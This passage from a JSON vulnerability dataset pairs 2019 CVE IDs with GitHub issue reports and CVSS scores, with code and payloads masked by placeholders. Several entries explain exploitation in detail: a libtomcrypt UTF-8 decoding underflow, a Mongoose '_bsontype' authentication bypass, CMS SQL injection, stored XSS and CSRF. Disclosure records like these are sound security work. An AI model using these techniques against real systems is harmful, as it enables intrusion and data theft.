  39723. "description": "Vulnerability in der_decode_utf8_string. Description The APITAG function (in der_decode_utf8_string.c) does not properly detect certain invalid UTF NUMBERTAG sequences. This allows context dependent attackers to cause a denial of service (out of bounds read and crash) or read information from other memory locations via carefully crafted DER encoded data. Attack vectors To exploit this vulnerability an attacker must be able to provide crafted DER encoded data to APITAG (e.g. by importing a NUMBERTAG certificate). Information disclosure is made possible by a NUMBERTAG steps attack where the imported data is later somehow re encoded and sent to the attacker (e.g. import and then export NUMBERTAG certificate). Details This vulnerability affects APITAG NUMBERTAG and earlier versions. For the remainder of this issue I will be referring to the code of APITAG last released version (i.e. version NUMBERTAG FILETAG The cause of the problem lies in the decoding loop at line NUMBERTAG of der_decode_utf8_string.c: CODETAG Here the variable tmp contains the value of the first byte of the utf NUMBERTAG encoded character. In accordance to FILETAG the number of most significant bits of tmp set at NUMBERTAG from left to right) prior to a NUMBERTAG indicates the number of bytes used to encode the utf NUMBERTAG character (i.e. a sequence starting by NUMBERTAG indicates a size of NUMBERTAG bytes) . However notice that NUMBERTAG is not a valid NUMBERTAG st byte. The loop in question fails to detect this case and process a sequence starting with NUMBERTAG as if it was a sequence of two bytes. A valid utf NUMBERTAG sequence of two bytes is of the form NUMBERTAG and can encode values up to NUMBERTAG FF. Yet APITAG accepts sequences of two bytes of the form NUMBERTAG This invalid form offers an additional free bit and can therefore encode values up to APITAG hence including a range of values that would normally be encodable only using a sequence of at least NUMBERTAG bytes. This behavior can be used to trick APITAG into reporting a length bigger than the actual size of the encoded string. This works because the function APITAG returns a number of bytes based on the size of the decoded value. To see an example of how this can be exploited to crash the program or read data after the DER buffer, let us consider the function APITAG (used to decode NUMBERTAG certificates). When an utf NUMBERTAG entry is encountered this function will first decode it in an array pointed by APITAG and then compute the length using APITAG on the decoded data: ERRORTAG The computed len is later used to move forward some pointers: APITAG The variable inlen points to the size of the remaining number of bytes to decode. Using the aforementioned bug it is possible to craft an input such that APITAG . In this case APITAG will underflow resulting in a much bigger value than the actual size of user's input. Finally, this can be used to crash the program (e.g. by reading invalid memory location) or to trick the DER decoder into including adjacent data into the decoded sequence. APITAG Following I include two profs of concept. poc1 will likely cause a program to crash by triggering a read of NUMBERTAG ffffffff additional bytes (thus probably ending up in an invalid memory page). poc2 will add NUMBERTAG ffff bytes of adjacent memory to the decoded sequence. This data can then be accessed, in a NUMBERTAG steps attack scenario, by exporting the certificate. Notice that poc2 will very likely NOT cause the program to crash since any invalid DER type encountered after the leaked data will just cause the decoding to stop gracefully without causing any further error (line NUMBERTAG of der_decode_sequence_flexi.c). CODETAG CODETAG",
  39724. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  39725. "severity": "CRITICAL",
  39726. "baseScore": 9.1,
  39727. "impactScore": 5.2,
  39728. "exploitabilityScore": 3.9
  39729. },
  39730. {
  39731. "CVE_ID": "CVE-2019-17371",
  39732. "Issue_Url_old": "https://github.com/glennrp/libpng/issues/307",
  39733. "Issue_Url_new": "https://github.com/glennrp/libpng/issues/307",
  39734. "Repo_new": "glennrp/libpng",
  39735. "Issue_Created_At": "2019-07-11T08:03:58Z",
  39736. "description": "memory leak in png_malloc_warn and png_create_info_struct. Hi,libpng team. there are memory leaks in the function APITAG and APITAG , respectively. I compiler gif2png to the NUMBERTAG bit LSB version with ASAN. The software runs in the NUMBERTAG Ubuntu NUMBERTAG services. the bug is trigered by APITAG . FILETAG the asan debug info is as follows: APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG ffff6c NUMBERTAG c0d in png_malloc_warn ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG ffff6c3e NUMBERTAG in png_create_info_struct ( PATHTAG NUMBERTAG d8 in processfile ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ffff NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG df0 in xalloc ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ERRORTAG a6d in APITAG ( PATHTAG ERRORTAG a6d NUMBERTAG in processfile ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ffff NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG df0 in xalloc ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG cc in APITAG ( PATHTAG ERRORTAG NUMBERTAG cc NUMBERTAG in processfile ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ffff NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). APITAG NUMBERTAG process NUMBERTAG exited with code NUMBERTAG",
  39737. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39738. "severity": "MEDIUM",
  39739. "baseScore": 6.5,
  39740. "impactScore": 3.6,
  39741. "exploitabilityScore": 2.8
  39742. },
  39743. {
  39744. "CVE_ID": "CVE-2019-17383",
  39745. "Issue_Url_old": "https://github.com/dspinhirne/netaddr-rb/issues/29",
  39746. "Issue_Url_new": "https://github.com/dspinhirne/netaddr-rb/issues/29",
  39747. "Repo_new": "dspinhirne/netaddr-rb",
  39748. "Issue_Created_At": "2022-04-21T09:19:14Z",
  39749. "description": "Release NUMBERTAG MENTIONTAG Would it be possible to release NUMBERTAG to APITAG As far as we understand it, it fixes URLTAG",
  39750. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39751. "severity": "CRITICAL",
  39752. "baseScore": 9.8,
  39753. "impactScore": 5.9,
  39754. "exploitabilityScore": 3.9
  39755. },
  39756. {
  39757. "CVE_ID": "CVE-2019-17401",
  39758. "Issue_Url_old": "https://github.com/libyal/liblnk/issues/40",
  39759. "Issue_Url_new": "https://github.com/libyal/liblnk/issues/40",
  39760. "Repo_new": "libyal/liblnk",
  39761. "Issue_Created_At": "2019-10-07T18:06:02Z",
  39762. "description": "Heap Buffer Overflow in lnkinfo. We found Heap Buffer Overflow in lnkinfo binary and lnkinfo is complied with clang enabling ASAN. Machine Setup Machine : Ubuntu NUMBERTAG LTS gcc version NUMBERTAG APITAG NUMBERTAG APITAG Commit : c NUMBERTAG bb7 lnkinfo NUMBERTAG Command : lnkinfo v POC POC : FILETAG ASAN Output ERRORTAG",
  39763. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
  39764. "severity": "LOW",
  39765. "baseScore": 3.3,
  39766. "impactScore": 1.4,
  39767. "exploitabilityScore": 1.8
  39768. },
  39769. {
  39770. "CVE_ID": "CVE-2019-17402",
  39771. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/1019",
  39772. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/1019",
  39773. "Repo_new": "exiv2/exiv2",
  39774. "Issue_Created_At": "2019-10-06T09:21:25Z",
  39775. "description": "Overflow in exi NUMBERTAG We found vulnerability in exi NUMBERTAG binary and exi NUMBERTAG is complied with clang enabling ASAN. Machine Setup CODETAG ASAN Output ERRORTAG",
  39776. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39777. "severity": "MEDIUM",
  39778. "baseScore": 6.5,
  39779. "impactScore": 3.6,
  39780. "exploitabilityScore": 2.8
  39781. },
  39782. {
  39783. "CVE_ID": "CVE-2019-17417",
  39784. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/2",
  39785. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/2",
  39786. "Repo_new": "lolipop1234/xxd",
  39787. "Issue_Created_At": "2019-10-08T02:12:20Z",
  39788. "description": "Pbootcms background storage XSS.",
  39789. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  39790. "severity": "MEDIUM",
  39791. "baseScore": 4.8,
  39792. "impactScore": 2.7,
  39793. "exploitabilityScore": 1.7
  39794. },
  39795. {
  39796. "CVE_ID": "CVE-2019-17418",
  39797. "Issue_Url_old": "https://github.com/evi1code/Just-for-fun/issues/2",
  39798. "Issue_Url_new": "https://github.com/evi1code/just-for-fun/issues/2",
  39799. "Repo_new": "evi1code/Just-for-fun",
  39800. "Issue_Created_At": "2019-10-09T05:34:13Z",
  39801. "description": "Metinfo NUMBERTAG ulnerability Name: Metinfo CMS Background SQL Union Select Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG ERRORTAG $no PATHTAG Incoming by user, and Unfiltered. And success function return the information. payload ERRORTAG Vulnerability Name: Metinfo CMS Background SQL Blind Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG ulnerability code ERRORTAG doget_admin_pack function was called in APITAG function, and the two variables of $appno and $site passed by the user were not filtered. payload CODETAG",
  39802. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  39803. "severity": "HIGH",
  39804. "baseScore": 7.2,
  39805. "impactScore": 5.9,
  39806. "exploitabilityScore": 1.2
  39807. },
  39808. {
  39809. "CVE_ID": "CVE-2019-17419",
  39810. "Issue_Url_old": "https://github.com/evi1code/Just-for-fun/issues/1",
  39811. "Issue_Url_new": "https://github.com/evi1code/just-for-fun/issues/1",
  39812. "Repo_new": "evi1code/Just-for-fun",
  39813. "Issue_Created_At": "2019-10-08T15:57:39Z",
  39814. "description": "Metinfo NUMBERTAG SQL Blind Injection. Vulnerability Name: Metinfo NUMBERTAG CMS Background SQL Blind Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG payload CODETAG Vulnerability code ERRORTAG $id Incoming by user, and Unfiltered. GET payload: APITAG",
  39815. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  39816. "severity": "HIGH",
  39817. "baseScore": 7.2,
  39818. "impactScore": 5.9,
  39819. "exploitabilityScore": 1.2
  39820. },
  39821. {
  39822. "CVE_ID": "CVE-2019-17426",
  39823. "Issue_Url_old": "https://github.com/Automattic/mongoose/issues/8222",
  39824. "Issue_Url_new": "https://github.com/automattic/mongoose/issues/8222",
  39825. "Repo_new": "automattic/mongoose",
  39826. "Issue_Created_At": "2019-10-07T17:38:20Z",
  39827. "description": "Mongoose query . Do you want to request a feature or report a bug ? Vulnerability What is the current behavior? With this vulnerability, an attacker might steal sensitive data/bypass authentication in nodejs applications that use mongoose as front end. When injecting \"_bsontype\" attribute to a query object (e.g., id in find(id)), Mongoose will directly ignore the query object. This can be abused since most nodejs applications treat user input as an object. For example, an attacker can force the query filter condition to be null by adding another attribute (_bsontype) to the user input data. By doing this, an attacker can log into other users' accounts or bypass the token verification logics during password reset NUMBERTAG Even though Mongoose checks the query object according to the scheme when querying in the form of APITAG the vulnerability can still be exploited if developers do queries like APITAG Similar issues are also found it Mongodb, and we have reported it. However, just to be safe, my suggestion is that mongoose should also filter _bsontype before invoking mongodb since _bsontype is an internal attribute used by mongodb NUMBERTAG URLTAG If the current behavior is a bug, please provide the steps to reproduce. Proof of Concept ERRORTAG What are the versions of FILETAG , Mongoose and APITAG you are using? Note that \"latest\" is not a version. Mongoose NUMBERTAG",
  39828. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  39829. "severity": "CRITICAL",
  39830. "baseScore": 9.1,
  39831. "impactScore": 5.2,
  39832. "exploitabilityScore": 3.9
  39833. },
  39834. {
  39835. "CVE_ID": "CVE-2019-17429",
  39836. "Issue_Url_old": "https://github.com/Adhouma/cms/issues/1",
  39837. "Issue_Url_new": "https://github.com/adhouma/cms/issues/1",
  39838. "Repo_new": "Adhouma/cms",
  39839. "Issue_Created_At": "2019-10-10T02:57:45Z",
  39840. "description": "There is SQL injection in your source code. In the FILETAG file, you get the p_id parameter by GET, and then call the SQL query statement directly by passing the parameter without any filtering. This results in SQL injection Use Sqlamp FILETAG FILETAG",
  39841. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39842. "severity": "CRITICAL",
  39843. "baseScore": 9.8,
  39844. "impactScore": 5.9,
  39845. "exploitabilityScore": 3.9
  39846. },
  39847. {
  39848. "CVE_ID": "CVE-2019-17430",
  39849. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/1",
  39850. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/1",
  39851. "Repo_new": "weng-xianhu/eyoucms",
  39852. "Issue_Created_At": "2019-06-21T10:32:09Z",
  39853. "description": "Reflective XSS vulnerabilities exist in websites. Cross Site Script Users often click on links when browsing websites, using instant messaging software, or even reading e mail. Attackers can steal user information by inserting malicious code into links. After the administrator logged in, open the following one page url: FILETAG poc: in web_recordnum",
  39854. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39855. "severity": "MEDIUM",
  39856. "baseScore": 6.1,
  39857. "impactScore": 2.7,
  39858. "exploitabilityScore": 2.8
  39859. },
  39860. {
  39861. "CVE_ID": "CVE-2019-17433",
  39862. "Issue_Url_old": "https://github.com/z-song/laravel-admin/issues/3847",
  39863. "Issue_Url_new": "https://github.com/z-song/laravel-admin/issues/3847",
  39864. "Repo_new": "z-song/laravel-admin",
  39865. "Issue_Created_At": "2019-08-27T16:09:59Z",
  39866. "description": "a security issue. laravel admin background XSS first.add xss Roles FILETAG next go to operation log page FILETAG The following is my system environment FILETAG And I think this issue also exists in other APITAG don't know this place.",
  39867. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  39868. "severity": "MEDIUM",
  39869. "baseScore": 4.8,
  39870. "impactScore": 2.7,
  39871. "exploitabilityScore": 1.7
  39872. },
  39873. {
  39874. "CVE_ID": "CVE-2019-17434",
  39875. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/304",
  39876. "Issue_Url_new": "https://github.com/lavalite/cms/issues/304",
  39877. "Repo_new": "lavalite/cms",
  39878. "Issue_Created_At": "2019-09-04T03:51:02Z",
  39879. "description": "Stored XSS. I find a Stored XSS client user can use this vulnerability to attack administrator APITAG use js to send post request, indirectly operate the administrator account\uff0ca serious threat to website security\u3002 exploit client login site,and modify the account name to ERRORTAG now\uff0cif super user login and look APITAG trigger XSS\u3002 FILETAG Hackers can exploit this vulnerability to perform any action by the administrator",
  39880. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39881. "severity": "MEDIUM",
  39882. "baseScore": 5.4,
  39883. "impactScore": 2.7,
  39884. "exploitabilityScore": 2.3
  39885. },
  39886. {
  39887. "CVE_ID": "CVE-2019-17452",
  39888. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/434",
  39889. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/434",
  39890. "Repo_new": "axiomatic-systems/bento4",
  39891. "Issue_Created_At": "2019-09-29T17:37:28Z",
  39892. "description": "SEGV in mp4dump. System Details Commit ID: bc1b NUMBERTAG a Test Machine : Ubuntu NUMBERTAG LTS MP4 File Dumper Version NUMBERTAG APITAG Version NUMBERTAG Command mp4dump verbosity NUMBERTAG POC file ASAN Output ERRORTAG",
  39893. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39894. "severity": "MEDIUM",
  39895. "baseScore": 6.5,
  39896. "impactScore": 3.6,
  39897. "exploitabilityScore": 2.8
  39898. },
  39899. {
  39900. "CVE_ID": "CVE-2019-17453",
  39901. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/436",
  39902. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/436",
  39903. "Repo_new": "axiomatic-systems/bento4",
  39904. "Issue_Created_At": "2019-09-30T07:47:11Z",
  39905. "description": "SEGV in mp4compact. System Details Commit ID: bc1b NUMBERTAG a Test Machine : Ubuntu NUMBERTAG LTS MP4 File Dumper Version NUMBERTAG APITAG Version NUMBERTAG Command mp4compact POC /dev/null ASAN Output ERRORTAG",
  39906. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39907. "severity": "MEDIUM",
  39908. "baseScore": 6.5,
  39909. "impactScore": 3.6,
  39910. "exploitabilityScore": 2.8
  39911. },
  39912. {
  39913. "CVE_ID": "CVE-2019-17453",
  39914. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/437",
  39915. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/437",
  39916. "Repo_new": "axiomatic-systems/bento4",
  39917. "Issue_Created_At": "2019-09-30T16:31:42Z",
  39918. "description": "SEGV in mp4encrypt. System Details Commit ID: bc1b NUMBERTAG a Test Machine : Ubuntu NUMBERTAG LTS MP4 Encrypter Version NUMBERTAG APITAG Version NUMBERTAG Command mp4encrypt method OMA PDCF CBC show progress POC /dev/null ASAN Output ERRORTAG",
  39919. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39920. "severity": "MEDIUM",
  39921. "baseScore": 6.5,
  39922. "impactScore": 3.6,
  39923. "exploitabilityScore": 2.8
  39924. },
  39925. {
  39926. "CVE_ID": "CVE-2019-17454",
  39927. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/435",
  39928. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/435",
  39929. "Repo_new": "axiomatic-systems/bento4",
  39930. "Issue_Created_At": "2019-09-29T20:00:36Z",
  39931. "description": "SEGV in mp4info. System Details Commit ID: bc1b NUMBERTAG a Test Machine : Ubuntu NUMBERTAG LTS MP4 File Dumper Version NUMBERTAG APITAG Version NUMBERTAG Command mp4info show samples POC file ASAN Output ERRORTAG",
  39932. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39933. "severity": "MEDIUM",
  39934. "baseScore": 6.5,
  39935. "impactScore": 3.6,
  39936. "exploitabilityScore": 2.8
  39937. },
  39938. {
  39939. "CVE_ID": "CVE-2019-17488",
  39940. "Issue_Url_old": "https://github.com/b3log/symphony/issues/970",
  39941. "Issue_Url_new": "https://github.com/b3log/symphony/issues/970",
  39942. "Repo_new": "b3log/symphony",
  39943. "Issue_Created_At": "2019-10-05T14:43:47Z",
  39944. "description": "\u4fee\u6539\u5e16\u5b50\u65f6\u6709xss\u6f0f\u6d1e, APITAG \u6839\u636e\u6b64\u9879\u76ee\u62a5\u544a\u5b89\u5168\u6f0f\u6d1e\u7684\u7b56\u7565. APITAG \u6211\u5df2\u5c06\u5177\u4f53\u6f0f\u6d1e\u8be6\u60c5\u53d1\u90ae\u4ef6\u81f3\u4f60\u7684\u90ae\u7bb1 EMAILTAG rg \u6ce8\u610f\u67e5\u6536.",
  39945. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39946. "severity": "MEDIUM",
  39947. "baseScore": 6.1,
  39948. "impactScore": 2.7,
  39949. "exploitabilityScore": 2.8
  39950. },
  39951. {
  39952. "CVE_ID": "CVE-2019-17489",
  39953. "Issue_Url_old": "https://github.com/shi-yang/jnoj/issues/51",
  39954. "Issue_Url_new": "https://github.com/shi-yang/jnoj/issues/51",
  39955. "Repo_new": "shi-yang/jnoj",
  39956. "Issue_Created_At": "2019-10-06T16:13:29Z",
  39957. "description": "NUMBERTAG APITAG NUMBERTAG ERRORTAG \u53d1\u4e00\u4e2aHTTP\u8bf7\u6c42\u5185\u5bb9\u5982\u4e0b: ERRORTAG \u8bf7\u6c42\u6210\u529f\u540e\u8bbf\u95eeurl APITAG NUMBERTAG ss\u6f0f\u6d1e Payload CODETAG \u67e5\u770b\u95ee\u9898\u6807\u9898\u5217\u8868\u5373\u53ef\u89e6\u53d1. APITAG NUMBERTAG ss\u4ee3\u7801 APITAG Payload ERRORTAG NUMBERTAG ss\u4ee3\u7801. APITAG NUMBERTAG APITAG APITAG PHP\u540e\u7aef\u5904\u7406\u5bf9hint\u53c2\u6570\u7684\u8fc7\u6ee4\u89c4\u5219\u5982\u4e0b APITAG APITAG APITAG APITAG \u6211\u770b\u4e86\u4e0b\u540e\u53f0\u7ba1\u7406\u4e5f\u6709\u51e0\u5904XSS NUMBERTAG HTTP\u8bf7\u6c42\u5982\u4e0b CODETAG \u89e6\u53d1\u9875\u9762 APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  39958. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39959. "severity": "MEDIUM",
  39960. "baseScore": 6.1,
  39961. "impactScore": 2.7,
  39962. "exploitabilityScore": 2.8
  39963. },
  39964. {
  39965. "CVE_ID": "CVE-2019-17494",
  39966. "Issue_Url_old": "https://github.com/baijunyao/laravel-bjyblog/issues/118",
  39967. "Issue_Url_new": "https://github.com/baijunyao/laravel-bjyblog/issues/118",
  39968. "Repo_new": "baijunyao/laravel-bjyblog",
  39969. "Issue_Created_At": "2019-10-07T13:51:50Z",
  39970. "description": "\u7533\u8bf7\u53cb\u94fe\u5b58\u5728xss\u6f0f\u6d1e. \u5728\u524d\u53f0\u7533\u8bf7\u53cb\u94fe\u7684\u65f6\u5019\u5728url\u5730\u5740\u8f93\u5165 APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG \u6ca1\u6709\u5224\u65ad\u5b57\u7b26\u4e32\u5728http\u7684\u4f4d\u7f6e, APITAG \u90a3\u8fd9\u6837\u5c31\u7ed5\u8fc7\u4e86,\u5e94\u8be5\u5224\u65adhttp\u8981\u5728\u5b57\u7b26\u4e32\u5f00\u59cb\u4f4d\u7f6e\u51fa\u73b0.",
  39971. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39972. "severity": "MEDIUM",
  39973. "baseScore": 6.1,
  39974. "impactScore": 2.7,
  39975. "exploitabilityScore": 2.8
  39976. },
  39977. {
  39978. "CVE_ID": "CVE-2019-17521",
  39979. "Issue_Url_old": "https://github.com/Elias-Black/Landing-CMS/issues/8",
  39980. "Issue_Url_new": "https://github.com/elias-black/landing-cms/issues/8",
  39981. "Repo_new": "elias-black/landing-cms",
  39982. "Issue_Created_At": "2019-09-10T07:45:27Z",
  39983. "description": "Landing CMS has Cross site request forgery.. URLTAG I can change the admin's password when admin click the csrf html file. payload: CODETAG FILETAG",
  39984. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  39985. "severity": "MEDIUM",
  39986. "baseScore": 6.5,
  39987. "impactScore": 3.6,
  39988. "exploitabilityScore": 2.8
  39989. },
  39990. {
  39991. "CVE_ID": "CVE-2019-17522",
  39992. "Issue_Url_old": "https://github.com/HotaruCMS/HotaruCMS/issues/101",
  39993. "Issue_Url_new": "https://github.com/hotarucms/hotarucms/issues/101",
  39994. "Repo_new": "hotarucms/hotarucms",
  39995. "Issue_Created_At": "2019-09-26T09:21:57Z",
  39996. "description": "APITAG NUMBERTAG has a Stored Cross Site Scripting in SITE NAME.. FILETAG FILETAG FILETAG",
  39997. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  39998. "severity": "MEDIUM",
  39999. "baseScore": 4.8,
  40000. "impactScore": 2.7,
  40001. "exploitabilityScore": 1.7
  40002. },
  40003. {
  40004. "CVE_ID": "CVE-2019-17528",
  40005. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/432",
  40006. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/432",
  40007. "Repo_new": "axiomatic-systems/bento4",
  40008. "Issue_Created_At": "2019-09-23T02:21:12Z",
  40009. "description": "SEGV_UNKNOW was discovered in APITAG in APITAG . bento4 version bento NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. APITAG NUMBERTAG SEGV_UNKNOW description An issue was discovered in bento NUMBERTAG There is a/an SEGV_UNKNOW in function APITAG at APITAG NUMBERTAG commandline mp4edit APITAG a.mp4 source CODETAG bug report ERRORTAG others from fuzz project pwd bento4 mp4edit NUMBERTAG crash name pwd bento4 mp4edit NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. FILETAG",
  40010. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40011. "severity": "HIGH",
  40012. "baseScore": 7.5,
  40013. "impactScore": 3.6,
  40014. "exploitabilityScore": 3.9
  40015. },
  40016. {
  40017. "CVE_ID": "CVE-2019-17529",
  40018. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/430",
  40019. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/430",
  40020. "Repo_new": "axiomatic-systems/bento4",
  40021. "Issue_Created_At": "2019-09-23T02:16:44Z",
  40022. "description": "A heap buffer overflow was discovered in APITAG in APITAG bento4 version bento NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. APITAG NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4dump verbosity NUMBERTAG APITAG source ERRORTAG bug report ERRORTAG others from fuzz project pwd bento4 mp4dump NUMBERTAG crash name pwd bento4 mp4dump NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. FILETAG",
  40023. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40024. "severity": "HIGH",
  40025. "baseScore": 7.8,
  40026. "impactScore": 5.9,
  40027. "exploitabilityScore": 1.8
  40028. },
  40029. {
  40030. "CVE_ID": "CVE-2019-17530",
  40031. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/431",
  40032. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/431",
  40033. "Repo_new": "axiomatic-systems/bento4",
  40034. "Issue_Created_At": "2019-09-23T02:19:02Z",
  40035. "description": "A heap buffer overflow was discoverad in APITAG at APITAG NUMBERTAG bento4 version bento NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4dump verbosity NUMBERTAG APITAG source ERRORTAG bug report ERRORTAG others from fuzz project pwd bento4 mp4dump NUMBERTAG crash name pwd bento4 mp4dump NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. FILETAG",
  40036. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40037. "severity": "HIGH",
  40038. "baseScore": 7.8,
  40039. "impactScore": 5.9,
  40040. "exploitabilityScore": 1.8
  40041. },
  40042. {
  40043. "CVE_ID": "CVE-2019-17531",
  40044. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2498",
  40045. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2498",
  40046. "Repo_new": "fasterxml/jackson-databind",
  40047. "Issue_Created_At": "2019-10-12T17:42:27Z",
  40048. "description": "Block one more gadget type (apache log4j extras NUMBERTAG CVE to be allocated). Another gadget type reported regarding a class of apache log4j extras package. Mitre id: to be allocated Reporter: \u5f20\u5148\u8f89 Zhangxianhui Fix will be included in NUMBERTAG backported in NUMBERTAG branch too. Not consider vuln for NUMBERTAG or later.",
  40049. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40050. "severity": "CRITICAL",
  40051. "baseScore": 9.8,
  40052. "impactScore": 5.9,
  40053. "exploitabilityScore": 3.9
  40054. },
  40055. {
  40056. "CVE_ID": "CVE-2019-17537",
  40057. "Issue_Url_old": "https://github.com/shi-yang/jnoj/issues/53",
  40058. "Issue_Url_new": "https://github.com/shi-yang/jnoj/issues/53",
  40059. "Repo_new": "shi-yang/jnoj",
  40060. "Issue_Created_At": "2019-10-10T06:43:47Z",
  40061. "description": "NUMBERTAG PATHTAG NUMBERTAG ERRORTAG APITAG FILETAG APITAG NUMBERTAG PATHTAG NUMBERTAG ERRORTAG \u8bf7\u6c42url URLTAG APITAG \u4fee\u590d\u5efa\u8bae:\u5bf9\u4f20\u5165\u7684\u6587\u4ef6\u540d\u79f0\u505a\u6821\u9a8c.",
  40062. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  40063. "severity": "HIGH",
  40064. "baseScore": 7.5,
  40065. "impactScore": 3.6,
  40066. "exploitabilityScore": 3.9
  40067. },
  40068. {
  40069. "CVE_ID": "CVE-2019-17541",
  40070. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1641",
